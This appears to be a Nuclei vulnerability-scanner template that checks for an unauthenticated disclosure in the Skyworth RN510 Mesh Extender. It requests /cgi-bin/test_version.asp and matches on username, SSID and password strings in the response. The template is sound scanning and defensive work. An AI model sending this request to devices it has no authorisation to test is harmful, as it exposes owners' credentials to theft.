id: Skyworth-RN510-Info-Exposure

info:
  name: Unauthenticated Sensitive information Discloser in Skyworth RN510 Mesh Extender
  author: osamahamad
  severity: high
  tags: disclosure
  reference: https://seclists.org/fulldisclosure/2021/May/8

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cgi-bin/test_version.asp'

    matchers:
      - type: word
        part: body
        words:
          - "username"
          - "SSID"
          - "password"
          - "5G"
        condition: and
